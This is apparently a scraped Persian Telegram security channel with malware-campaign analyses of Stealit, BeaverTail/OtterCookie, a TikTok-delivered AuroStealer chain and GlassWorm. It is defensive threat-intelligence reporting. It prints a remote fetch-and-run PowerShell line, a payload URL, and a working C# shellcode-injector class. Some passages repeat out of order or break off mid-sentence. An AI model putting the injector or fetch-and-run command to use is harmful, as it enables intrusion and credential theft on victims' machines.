تحلیل کمپین بدافزار جدید Stealit
و بهرهبرداری از قابلیت Node.js SEA برای پنهانسازی و گسترش
محققان FortiGuard به تازگی یک کمپین فعال و جدید از بدافزار سرقت اطلاعات Stealit را شناسایی کرده است که از یک تکنیک نوآورانه برای توزیع و اجرای payloadهای خود بهره میبرد. این کمپین با استفاده از قابلیت آزمایشی Single Executable Application (SEA) در Node.js، اسکریپتهای مخرب خود را به صورت یک فایل اجرایی مستقل بستهبندی میکند. این رویکرد به بدافزار اجازه میدهد تا بدون نیاز به پیشنصب بودن Node.js روی سیستم قربانی، اجرا شود و در نتیجه شناسایی آن را دشوارتر میسازد.
در ادامه، تحلیل فنی دقیقی از این کمپین، از مکانیزم توزیع تا اجزای اصلی و تکنیکهای فرار از تحلیل آن ارائه میشود.
زنجیره آلودگی و توزیع
بدافزار Stealit ، همانند نسخههای پیشین، خود را در قالب نصبکنندههای نرمافزارهای قانونی مانند بازیها و برنامههای VPN مخفی میکند. این فایلهای آلوده از طریق پلتفرمهای اشتراکگذاری فایل نظیر Mediafire و Discord توزیع میشوند. مهاجمان برای پیچیدهتر کردن فرآیند تحلیل، این نصبکنندهها را با ابزارهایی مانند PyInstaller بستهبندی کرده یا در آرشیوهای فشرده قرار میدهند.
جالب توجه است که وبسایت پنل کنترل و فرماندهی (C2) این بدافزار نیز به دامنههای جدیدی منتقل شده است. این وبسایت، Stealit را به عنوان یک "راهحل حرفهای استخراج داده" با طرحهای اشتراک مختلف برای سیستمعاملهای ویندوز و اندروید تبلیغ میکند و حتی یک کانال تلگرامی برای جذب مشتریان بالقوه دارد.
تحلیل فنی نصبکننده (Installer)
فرآیند نصب بدافزار چند لایه و بسیار پیچیده است و در تمام مراحل از obfuscation سنگین برای جلوگیری از تحلیل کد استفاده میشود.
#**لایه اول: بهرهبرداری از Node.js SEA**
فایل اجرایی اولیه یک بسته Node.js SEA است. این قابلیت آزمایشی، تمام اسکریپتها و وابستگیهای لازم را در یک فایل باینری واحد جمعآوری میکند. اسکریپت مخرب اصلی در بخشی از منابع فایل اجرایی به نام
NODE_SEA_BLOB ذخیره شده است. بررسی متادیتای این بخش نشان میدهد که این بسته با استفاده از یک پروژه متنباز به نام AngaBlue ساخته شده که فرآیند ایجاد فایلهای اجرایی SEA را خودکار میکند.#**لایههای دوم و سوم: اجرای درون حافظه**
اسکریپت لایه اول پس از اجرا، یک blob بزرگ و رمزنگاریشده را از داخل خود استخراج، رمزگشایی و با استفاده از تابع
require در Node.js مستقیماً در حافظه اجرا میکند. این اسکریپت لایه دوم نیز به نوبه خود، اسکریپت لایه سوم را که باز هم به شدت مبهمسازی شده، در حافظه اجرا میکند. این تکنیک زنجیرهای اجرای درون حافظه، تحلیل مبتنی بر فایل را بسیار دشوار میسازد.تکنیکهای ضد تحلیل (Anti-Analysis)
اسکریپت لایه سوم، پیش از نصب اجزای اصلی، مجموعهای گسترده از بررسیها را برای تشخیص محیطهای تحلیل و ماشینهای مجازی انجام میدهد. این بررسیها شامل موارد زیر است:
* تشخیص محیط مجازی: حداقل حافظه سیستم (2GB)، تعداد هستههای پردازنده (حداقل 2)، و بررسی نام کاربری و نام میزبان در برابر لیست سیاه کلمات کلیدی (مانند
vmware , sandbox , analyst , test ).* بررسی فایلها و مسیرهای مشکوک: جستجو برای فایلها و درایورهای مرتبط با VMware و VirtualBox.
* تحلیل زمانی (Timing Analysis): اندازهگیری زمان اجرای عملیات ریاضی برای تشخیص کندی ناشی از دیباگرها.
* شناسایی فرآیندهای پیشرفته: اجرای دستور
wmic برای لیست کردن تمام فرآیندها و جستجو برای نام ابزارهای تحلیل رایج (مانند wireshark , x64dbg , IDA , Ghidra , Process Monitor ) یا آرگومانهای مرتبط با دیباگ.* بررسی پورتهای شبکه: اجرای
netstat –an برای یافتن پورتهای فعال که در لیست سیاه قرار دارند.* تحلیل رجیستری: بررسی کلیدهای رجیستری مرتبط با دیباگرها.
* تشخیص تزریق DLL: بررسی DLLهای بارگذاریشده در فرآیند بدافزار برای یافتن موارد مرتبط با ابزارهای تحلیل.
* بررسی فرآیند والد (Parent Process): چک کردن فرآیند والد برای اطمینان از اینکه خود توسط یک ابزار تحلیل اجرا نشده باشد.
اگر هر یک از این بررسیها نشان دهد که بدافزار در حال تحلیل است، با نمایش یک پیام خطا، اجرای خود را متوقف میکند.
نصب و ماندگاری اجزای اصلی
پس از عبور موفقیتآمیز از بررسیهای ضد تحلیل، نصبکننده سه کامپوننت اصلی را از سرور C2 دانلود میکند:
save_data.exe , stats_db.exe و game_cache.exe .این فایلها در یک مسیر تصادفی در
AppData\Local ذخیره میشوند و برای جلوگیری از اسکن توسط Windows Defender، مسیر دایرکتوری ایجاد شده با استفاده از یک دستور PowerShell به لیست استثنائات (Exclusion list) آن اضافه میشود.Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
برای ماندگاری ، بدافزار یک اسکریپت Visual Basic به نام
تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
startup.vbs در پوشه Startup ویندوز ایجاد میکند که وظیفه اجرای کامپوننت game_cache.exe را در هر بار راهاندازی سیستم بر عهده دارد.تحلیل کامپوننتهای Payload
کامپوننتهای دانلود شده، برخلاف نصبکننده اولیه که از SEA استفاده میکند، با ابزار متنباز دیگری به نام Pkg بستهبندی شدهاند. هر یک از این کامپوننتها وظیفه مشخصی را دنبال میکنند:
1۔ save_data.exe : این کامپوننت تنها در صورتی اجرا میشود که بدافزار با دسترسی بالا (elevated privileges) اجرا شده باشد. وظیفه اصلی آن استخراج اطلاعات از مرورگرهای مبتنی بر Chromium است. برای این کار، ابزاری به نام
cache.exe را که بر پایه پروژه متنباز ChromElevator توسعه یافته، از خود استخراج و اجرا میکند. این ابزار قادر است مکانیزمهای امنیتی مرورگرها را دور بزند.2۔ stats_db.exe: این کامپوننت یک سارق اطلاعات (Info-stealer) قدرتمند است که طیف وسیعی از برنامهها را هدف قرار میدهد. پیش از شروع سرقت، فرآیندهای مرتبط با برنامههای هدف را خاتمه میدهد. اهداف آن عبارتند از:
* مرورگرها: Google Chrome, Microsoft Edge, Mozilla Firefox و دهها مرورگر دیگر.
* برنامههای مرتبط با بازی: Steam, Minecraft, Epic Games Launcher.
* پیامرسانها: WhatsApp, Telegram.
* کیف پولهای ارز دیجیتال: طیف گستردهای از کیف پولهای دسکتاپ (مانند Atomic و Exodus) و افزونههای مرورگر (مانند MetaMask, Coinbase, BinanceChain, Ronin).
3۔ game_cache.exe: این فایل، کلاینت اصلی بدافزار است که مسئولیت ارتباط با سرور C2 و اجرای دستورات مهاجم را بر عهده دارد. پس از اجرا، اطلاعات اولیه قربانی (نام کاربری و شناسه سختافزار) را به سرور ارسال کرده و منتظر دریافت فرمان میماند. این کامپوننت قابلیتهای یک تروجان دسترسی از راه دور (RAT) کامل را فراهم میکند، از جمله:
* مشاهده زنده صفحه نمایش و وبکم.
* اجرای دستورات از راه دور (CMD Executor).
* مدیریت سیستم (خاموش کردن، راهاندازی مجدد).
* سرقت فایلها از مسیرهای حساس.
* نصب و اجرای فایلهای اجرایی دیگر و ایجاد ماندگاری برای آنها.
* تغییر تصویر پسزمینه دسکتاپ.
* استقرار ماژول باجافزار.
بازگشت به فریمورک Electron
نکته بسیار مهم این است که در طول مدت کوتاهی پس از مشاهده این کمپین، نمونههای جدیدی از Stealit شناسایی شدند که به استفاده از فریمورک Electron (همانند کمپینهای قدیمیتر) بازگشته بودند. با این تفاوت که در نسخه جدید، اسکریپتهای Node.js بستهبندی شده با الگوریتم AES-256-GCM رمزنگاری شدهاند. این تغییر تاکتیک سریع، نشاندهنده انطباقپذیری بالای مهاجمان و تلاش مداوم آنها برای فرار از شناسایی است.
دانشگاه MIT یک هوش مصنوعی ساخته که میتونه کد خودش رو بازنویسی کنه تا باهوشتر بشه.
بهش میگن SEAL (مدلهای زبانی خود-تطبیقپذیر) .
به جای اینکه انسانها تنظیمش کنن، SEAL اطلاعات جدید رو خونده، اونا رو با کلمات خودش بازنویسی میکنه و بهروزرسانیهای گرادیان رو روی خودش اجرا میکنه و به معنای واقعی کلمه یادگیری خودراهبر داره.
و ما تازه وارد عصر مدلهای خود-تکاملی شدیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
پژوهشگران دو دانشگاه مطرح آمریکا بمدت سه سال یک آنتن نه چندان پیچیده رو به سمت آسمان گرفتند و به داده هاییکه بین ایستگاهای زمینی و ماهواره ها مبادله میشد گوش دادند. نتیجه تحقیق تکاندهنده هست!
اونها موفق به ضبط هزاران گفتوگوی صوتی و پیام کوتاه رمزنگاری نشده رو از کاربران یک شبکهٔ تلفن همراه شدند. همچنین ارتباطات برخی از نهادهای نظامی و اطلاعاتی در بین داده های ثبت شده وجود داشت که از اهمیت بالایی برخوردارند. این پژوهش نشون میده که نزدیک به نیمی از پیامهای ماهوارهای در مدار ثابت زمین بدون هیچ گونه رمزنگاری مبادله میشوند. یعنی سیلی از دادههای بسیار حساس از فراز زمین عبور میکنند و هر کس با یک ابزار ساده و هزینه ای کمتر از ۸۰۰ دلار قادر به دریافت انهاست.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - KittenBusters/CharmingKitten: Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500)
Exposing CharmingKitten's malicious activity for IRGC-IO Counterintelligence division (1500) - KittenBusters/CharmingKitten
تحلیلی عمیق بر یک روتکیت پیشرفته و پنهانکار هسته لینوکس
Singularity - Powerful Linux Kernel Rootkit
Please open Telegram to view this post
VIEW IN TELEGRAM
blog.kyntra.io
Singularity: Deep Dive into a Modern Stealth Linux Kernel Rootkit – Kyntra Blog
Deep dive into a modern stealth Linux kernel rootkit with advanced evasion and persistence techniques
Please open Telegram to view this post
VIEW IN TELEGRAM
Trend Micro
Operation Zero Disco: Attackers Exploit Cisco SNMP Vulnerability to Deploy Rootkits
Trend™ Research has uncovered an attack campaign exploiting the Cisco SNMP vulnerability CVE-2025-20352, allowing remote code execution and rootkit deployment on unprotected devices, with impacts observed on Cisco 9400, 9300, and legacy 3750G series.
تحلیل یک حمله:
ترکیب BeaverTail و OtterCookie با ماژول جدید Keylogging
گروه (APT) Famous Chollima ، که زیرمجموعهای از گروه بزرگتر Lazarus و همسو با منافع اقتصادی کره شمالی (DPRK) است، بار دیگر با تکامل ابزارهای خود، جامعه توسعهدهندگان و جویندگان کار در حوزه فناوری را هدف قرار داده است. در جدیدترین کمپین کشفشده ، این گروه با ترکیب دو بدافزار مجزای پیشین، BeaverTail و OtterCookie ، و افزودن یک ماژول جدید مبتنی بر جاوا اسکریپت برای Keylogging و (Screenshotting) ، یک ابزار سرقت اطلاعات یکپارچه و قدرتمند ایجاد کرده است.
بررسی اجمالی کمپین و تاکتیکها
- هدف: سرقت اطلاعات حساس، به ویژه ارزهای دیجیتال و اطلاعات اعتباری (credentials).
- قربانیان: عمدتاً جویندگان کار و توسعهدهندگان نرمافزار.
- روش مهندسی اجتماعی: مهاجمان با جعل هویت سازمانهای استخدامی و ارائه پیشنهادات شغلی جعلی، قربانیان را فریب میدهند تا یک اپلیکیشن آلوده را به عنوان بخشی از فرآیند مصاحبه یا آزمون فنی نصب کنند.
- نمونه موردی: در این حمله، یک سازمان در سریلانکا به صورت غیرمستقیم مورد هدف قرار گرفت. یکی از کارمندان این سازمان، فریب یک پیشنهاد شغلی جعلی را خورده و یک اپلیکیشن تروجانایز شده مبتنی بر Node.js به نام "Chessfi" را نصب کرده است. این اپلیکیشن که ظاهراً یک پلتفرم شطرنج مبتنی بر وب ۳ برای شرطبندی با ارز دیجیتال است، به عنوان طعمهای ایدهآل برای جذب اهداف علاقهمند به این حوزه عمل میکند.
زنجیره آلودگی: یک فرآیند چندمرحلهای و پنهانکارانه
مهاجمان برای پنهان کردن فعالیت مخرب خود از یک زنجیره آلودگی پیچیده استفاده میکنند که تشخیص آن برای یک توسعهدهنده معمولی دشوار است:
1. کلون کردن پروژه: قربانی از طریق پلتفرمهایی مانند Fiverr یا Discord ترغیب میشود تا یک پروژه نرمافزاری را از یک مخزن Git (در این مورد، Bitbucket) کلون کند.
2. نصب وابستگیها: طبق دستورالعملهای موجود در فایل
README.md ، قربانی دستور npm install را برای نصب پکیجهای مورد نیاز پروژه اجرا میکند.3. اجرای پکیج مخرب: در میان وابستگیها، یک پکیج مخرب به نام node-nvm-ssh که در مخزن رسمی NPM منتشر شده، دانلود و نصب میشود.
4. اسکریپت postinstall: فایل
package.json این پکیج مخرب حاوی یک اسکریپت postinstall است. این اسکریپت به گونهای طراحی شده که پس از اتمام نصب به طور خودکار اجرا شود. این اسکریپت، دستورات دیگری را فراخوانی میکند که در نهایت به اجرای یک فایل جاوا اسکریپت منجر میشود.5. ایجاد فرآیند فرزند (Child Process): یک اسکریپت میانی (
index.js) یک فرآیند فرزند جدا شده (detached child process) را ایجاد میکند تا اسکریپت مخرب بعدی (file15.js) را اجرا کند. این کار به بدافزار اجازه میدهد حتی پس از بسته شدن ترمینال اصلی، به اجرای خود ادامه دهد.6. بارگذاری پیلود نهایی: اسکریپت
file15.js محتویات یک فایل به نام test.list را میخواند و با استفاده از تابع eval() آن را اجرا میکند. این فایل حاوی پیلود نهایی است؛ یک کد جاوا اسکریپت بسیار بزرگ و مبهمسازی شده (Obfuscated) که ترکیبی از BeaverTail و OtterCookie است.تکامل بدافزار: ادغام BeaverTail و OtterCookie
تا پیش از این، BeaverTail و OtterCookie به عنوان دو ابزار مجزا اما مکمل عمل میکردند. اما در این کمپین، کارکردهای آنها در یک پیلود واحد ادغام شده است.
#**قابلیتهای به ارث برده از BeaverTail:
- **شمارش پروفایلها و افزونههای مرورگر: جستجو برای پروفایلهای مرورگرهای مختلف و افزونههای نصبشده، به ویژه افزونههای مرتبط با کیف پولهای ارز دیجیتال.
- دانلود پیلود ثانویه: قابلیت دانلود و اجرای ماژولهای پایتونی مانند InvisibleFerret (یک ابزار سرقت اطلاعات) از سرور فرماندهی و کنترل (C2).
- نصب ابزار دسترسی از راه دور: در نسخههای قدیمیتر، ابزارهایی مانند AnyDesk را برای کنترل کامل سیستم قربانی نصب میکرد.
#**قابلیتهای OtterCookie و ماژول جدید آن (نسخه v5):
۔ OtterCookie از یک ابزار ساده برای بارگذاری کد از راه دور به یک بدافزار ماژولار و پیشرفته تبدیل شده است.
- **ماژول Remote Shell: با استفاده از پکیج
socket.io-client یک ارتباط پایدار با سرور C2 برقرار کرده و به مهاجم اجازه میدهد دستورات را از راه دور روی سیستم قربانی اجرا کند.- ماژول سرقت فایل: فایل سیستم را برای یافتن فایلهای "جذاب" با الگوها و پسوندهای مشخص (مانند env , .metamask , .wallet , .pdf , .docx , .secret. , ... ) جستجو کرده و آنها را به سرور C2 آپلود میکند.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
- ماژول سرقت محتوای کلیپبورد: به طور دورهای محتوای کلیپبورد را بررسی کرده و به سرور C2 ارسال میکند.
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
- کلیدهای ثبتشده در فایلی به نام
- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
node-global-key-listener برای ثبت تمام کلیدهای فشردهشده کیبورد و screenshot-desktop برای گرفتن عکس از صفحه دسکتاپ استفاده میکند.- کلیدهای ثبتشده در فایلی به نام
1.tmp و اسکرینشاتها در فایلی به نام 2.jpeg در یک پوشه موقت (windows-cache) ذخیره میشوند.- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
هکرها با استفاده از ویدیوهای TikTok، بدافزار خود را نصب میکنند
این گزارش به تحلیل یک کمپین فعال مهندسی اجتماعی در پلتفرم TikTok میپردازد که کاربران را با وعده فعالسازی رایگان نرمافزارهای گرانقیمت مانند Photoshop، فریب داده و به نصب بدافزار سارق اطلاعات (InfoStealer) به نام AuroStealer آلوده میکند. این تحلیل، زنجیره آلودگی (Kill Chain) و تکنیکهای پیشرفته مورد استفاده مهاجمان را تشریح میکند.
مهاجمان از پلتفرم محبوب TikTok برای انتشار ویدئوهای فریبنده استفاده میکنند.
* طعمه : ارائه راهی آسان برای فعالسازی رایگان Adobe Photoshop.
* تکنیک: این حمله از یک تکنیک مهندسی اجتماعی مشابه ClickFix بهره میبرد. در این روش، به جای ارسال یک فایل اجرایی، قربانی ترغیب میشود تا با دسترسی Administrator ، یک خط فرمان PowerShell را مستقیماً اجرا کند. این کار باعث میشود کاربر، خود، مکانیزمهای امنیتی اولیه را دور بزند.
* فرمان مخرب:
iex (irm slmgr[.]win/photoshop)
۔* irm (Invoke-RestMethod): این cmdlet محتوا را از URL مشخص شده (
slmgr[.]win/photoshop) دانلود میکند.۔* iex (Invoke-Expression): این cmdlet خطرناک، محتوای دانلود شده (که یک اسکریپت پاورشل است) را مستقیماً در حافظه اجرا میکند. این یک تکنیک "fileless" (بدون فایل) است که از شناسایی مبتنی بر فایل توسط آنتیویروسها جلوگیری میکند.
## تحلیل زنجیره آلودگی (Kill Chain Analysis)
مرحله اول: اسکریپت پاورشل (Stager)
اسکریپت پاورشل دانلود شده از
slmgr[.]win (با هش SHA256: 6D897B56...) به عنوان مرحله اول (Stager) عمل میکند و دو وظیفه اصلی دارد:1. دانلود payload: دانلود مرحله بعدی بدافزار (
updater.exe) از آدرس https://file-epq[.]pages[.]dev/updater.exe2. ایجاد ماندگاری (Persistence):
* این اسکریپت یک Scheduled Task (وظیفه زمانبندی شده) ایجاد میکند تا بدافزار در هر بار لاگین کاربر اجرا شود (
-Trigger (New-ScheduledTaskTrigger -AtLogOn)).* تکنیک فرار از شناسایی (Evasion): برای جلوگیری از شناسایی و ترکیب شدن با وظایف سیستمی، اسکریپت به صورت تصادفی یکی از نامهای موجه زیر را برای وظیفه خود انتخاب میکند:
*
MicrosoftEdgeUpdateTaskMachineCore*
GoogleUpdateTaskMachineCore*
AdobeUpdateTask*
OfficeBackgroundTaskHandlerRegistration*
WindowsUpdateCheck* این وظیفه با بالاترین سطح دسترسی (
-RunLevel Highest) اجرا میشود، زیرا قربانی در ابتدا پاورشل را با دسترسی ادمین اجرا کرده است.مرحله دوم: پیلود اصلی (AuroStealer)
* فایل
updater.exe (با هش SHA256: 58b11b4d...) که توسط گزارش SANS به عنوان بدافزار AuroStealer (بر اساس Malpedia) شناسایی شده است.۔* AuroStealer یک (InfoStealer) است که احتمالاً مبتنی بر .NET میباشد. این نوع بدافزارها به طور خاص برای سرقت اطلاعات حساس مانند کوکیهای مرورگر، رمزهای عبور ذخیره شده، اطلاعات کارتهای اعتباری و دادههای مربوط به کیف پولهای ارز دیجیتال طراحی شدهاند.
مرحله سوم: پیلود ثانویه و تکنیک "خود-کامپایلی" (Self-Compiling)
* در نهایت، پیلود دومی به نام
source.exe (با هش SHA256: db57e4a7...) دانلود و اجرا میشود.* تکنیک پیشرفته (TTP): این بدافزار از یک تکنیک جالب برای فرار از شناسایی به نام "On-Demand Compilation" یا "Self-Compiling Malware" استفاده میکند.
1. بدافزار
source.exe به جای حمل مستقیم کد مخرب نهایی، حاوی سورس کد C\# است.2. سپس، کامپایلر قانونی و امضا شده مایکروسافت (
csc.exe) را که بخشی از .NET Framework است، فراخوانی میکند:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline3. این دستور، سورس کد موجود در فایل
vpkwkdbo.cmdline را در لحظه بر روی سیستم قربانی کامپایل میکند.* تحلیل کد C\# کامپایل شده: کد C\# کامپایل شده یک کلاس ساده به نام
SC ایجاد میکند که یک Shellcode Injector کلاسیک است:Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
public class SC {
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr h, uint m);
public static void Run(byte[] sc) {
// 1. تخصیص حافظه با دسترسی RWX (Read-Write-Execute)
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
// 2. کپی کردن شلکد در حافظه تخصیص یافته
Marshal.Copy(sc, 0, addr, sc.Length);
// 3. اجرای شلکد در یک نخ (Thread) جدید
IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(t, 0xFFFFFFFF);
}
}* اهمیت تکنیک: این روش بسیار موثر است زیرا:
1. فرار از تحلیل استاتیک: فایل
source.exe فاقد کدهای مخرب نهایی است و صرفاً سورس کد C\# را حمل میکند که شناسایی آن دشوارتر است.2. استفاده از LotL (Living-off-the-Land): از یک ابزار قانونی و مورد اعتماد سیستمعامل (
csc.exe) برای ساخت پیلود نهایی سوءاستفاده میکند.3. اجرای در حافظه: شلکد نهایی (که احتمالاً خود AuroStealer یا یک RAT است) مستقیماً در حافظه اجرا میشود و هیچ فایل اجرایی جدیدی روی دیسک باقی نمیگذارد.
* استفاده از
VirtualAlloc با پرچم 0x40 (PAGE\_EXECUTE\_READWRITE) یک پرچم قرمز بزرگ در تحلیل بدافزار است، زیرا به حافظه اجازه میدهد همزمان قابل نوشتن و قابل اجرا باشد (نقض اصل W^X).@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - TwoSevenOneT/DefenderWrite: A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing…
A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing into the executable folder of Antivirus software - TwoSevenOneT/DefenderWrite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
بدافزار GlassWorm تهاجم با کد نامرئی و C2 مبتنی بر بلاکچین به OpenVSX
تحلیلگران امنیتی از شناسایی یک worm خود-تکثیر (Self-Propagating) جدید به نام GlassWorm خبر دادهاند که به طور خاص افزونههای VS Code در مارکتپلیس OpenVSX را هدف قرار داده است. این حمله، که تنها یک ماه پس از شناسایی worm مشابهی به نام Shai Hulud در اکوسیستم npm رخ میدهد، نشاندهنده یک جهش قابل توجه در تکنیکهای حملات زنجیره تأمین است.
این GlassWorm صرفاً یک حمله زنجیره تأمین دیگر نیست؛ این بدافزار از مجموعهای از تکنیکهای بسیار پیشرفته استفاده میکند که آن را در رده حملات سطح APT قرار میدهد:
1۔ کد نامرئی (Invisible Code): استفاده از کاراکترهای یونیکد (Unicode) غیرقابل چاپ برای پنهانسازی کامل کد مخرب از دید بازبینهای انسانی و ابزارهای تحلیل استاتیک.
2۔ زیرساخت C2 مبتنی بر بلاکچین: استفاده از بلاکچین Solana به عنوان یک سرور C2 تغییرناپذیر و غیرقابل حذف (Immutable).
3۔ C2 پشتیبان: استفاده از Google Calendar به عنوان مکانیزم C2 ثانویه.
4۔ Payload نهایی: یک Remote Access Trojan (RAT) تمامعیار که ماشینهای توسعهدهندگان را به نودهای پراکسی (Proxy Node) در یک زیرساخت مجرمانه تبدیل میکند.
در حال حاضر (بر اساس گزارش اولیه)، این حمله فعال است. هفت افزونه در OpenVSX و یک افزونه در مارکتپلیس رسمی VSCode مایکروسافت آلوده شناسایی شدهاند که مجموعاً بیش از 35,800 بار دانلود شدهاند.
تکنیک پنهانسازی کد با یونیکد
مشخصه GlassWorm تکنیک پنهانسازی آن است. مهاجمان کد مخرب را نه با obfuscation یا minification، بلکه با استفاده از کاراکترهای انتخابگر تنوع یونیکد (Unicode variation selectors) در سورس کد جاوا اسکریپت افزونه تزریق کردهاند.
این کاراکترها، در حالی که بخشی از استاندارد یونیکد هستند، هیچ خروجی بصری در اکثر ویرایشگرهای کد (IDEها) مانند VS Code یا در ابزارهای بازبینی کد مانند
git diff ایجاد نمیکنند. در نتیجه، یک توسعهدهنده یا بازبین امنیتی، هنگام بررسی سورس کد، تنها چندین خط خالی یا فضای سفید مشاهده میکند، در حالی که مفسر جاوا اسکریپت این کاراکترها را به عنوان کد اجرایی معتبر شناسایی و اجرا میکند.این تکنیک به طور کامل فرآیندهای سنتی Code Review انسانی و ابزارهای SAST (Static Analysis Security Testing) را که برای شناسایی چنین کاراکترهایی طراحی نشدهاند، دور میزند.
زیرساخت C2 سهلایه و تخریبناپذیر
پیچیدگی GlassWorm در زیرساخت Command and Control آن به اوج میرسد:
